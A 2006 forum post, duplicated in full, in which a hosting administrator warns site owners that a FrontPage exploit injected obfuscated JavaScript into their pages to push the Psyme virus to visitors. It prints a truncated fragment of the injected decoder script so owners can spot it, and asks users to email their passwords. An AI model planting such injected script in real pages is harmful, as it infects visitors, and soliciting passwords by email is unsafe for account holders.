Silver_2000
11-04-2006, 09:34 AM
A few of you have websites on this server. I have tried emailing you but wanted to post here as well.
Microsoft stopped providing support for FrontPage about 6 months ago and it appears that there is an exploit that has been used on the server.
I have removed the FrontPage extensions from all the accounts on the server ( or tried to ) and for the sites I had login access to I have cleaned the index files.
If you were surfing one of these sites using internet explorer that was plain html that was created in FrontPage it likely was hacked and was trying to send you a virus. The virus is called psyme (http://vil.nai.com/vil/content/v_100749.htm) - antivirus companies have known about it for 2 years.
If you have a site on this server send me an email with your username and password and Ill clean the html file for you or you can do it - just look for an Iframe or a script that is added to the body tag that is really long
here is an example of the first part of the body tag
<body background="images/amback1.jpg"><script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,0,2 3,35,27,7,11,4,38,47,0,0,0,0,0,0,48,40,24,57,31,34
I don’t want to start a discussion about IE vs firefox or the insecurity of windows - since the server is running Linux that’s a bad argument anyway.
I just wanted everyone to be careful and to make DAMN sure you are running antivirus protection
Here is free antivirus that works well (http://www.download.com/AVG-Anti-Virus-Free-Edition/3000-2239_4-10596553.html?tag=lst-0-1)- If you want to buy AV and the support that comes with it - I can get you a discount on the fill version of AVG that is available for company use or home use with support.
You can dload firefox a safer browser that is not vulnerable to the virus using the links at the bottom of the page here - the Google pack includes some cool software from Google and firefox and TALON gets a buck or 2 when you install from that link.
I feel like I should apologize but there is nothing I could have done to prevent this. And we found it within 24 hours of its installation.
Once again - send me your username in email if you need help- AND keep in mind you will need to use FrontPage a little different to publish your sites from now on since the extensions are gone.
Doug
Microsoft stopped providing support for FrontPage about 6 months ago and it appears that there is an exploit that has been used on the server.
I have removed the FrontPage extensions from all the accounts on the server ( or tried to ) and for the sites I had login access to I have cleaned the index files.
If you were surfing one of these sites using internet explorer that was plain html that was created in FrontPage it likely was hacked and was trying to send you a virus. The virus is called psyme (http://vil.nai.com/vil/content/v_100749.htm) - antivirus companies have known about it for 2 years.
If you have a site on this server send me an email with your username and password and Ill clean the html file for you or you can do it - just look for an Iframe or a script that is added to the body tag that is really long
here is an example of the first part of the body tag
<body background="images/amback1.jpg"><script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,0,2 3,35,27,7,11,4,38,47,0,0,0,0,0,0,48,40,24,57,31,34
I don’t want to start a discussion about IE vs firefox or the insecurity of windows - since the server is running Linux that’s a bad argument anyway.
I just wanted everyone to be careful and to make DAMN sure you are running antivirus protection
Here is free antivirus that works well (http://www.download.com/AVG-Anti-Virus-Free-Edition/3000-2239_4-10596553.html?tag=lst-0-1)- If you want to buy AV and the support that comes with it - I can get you a discount on the fill version of AVG that is available for company use or home use with support.
You can dload firefox a safer browser that is not vulnerable to the virus using the links at the bottom of the page here - the Google pack includes some cool software from Google and firefox and TALON gets a buck or 2 when you install from that link.
I feel like I should apologize but there is nothing I could have done to prevent this. And we found it within 24 hours of its installation.
Once again - send me your username in email if you need help- AND keep in mind you will need to use FrontPage a little different to publish your sites from now on since the extensions are gone.
Doug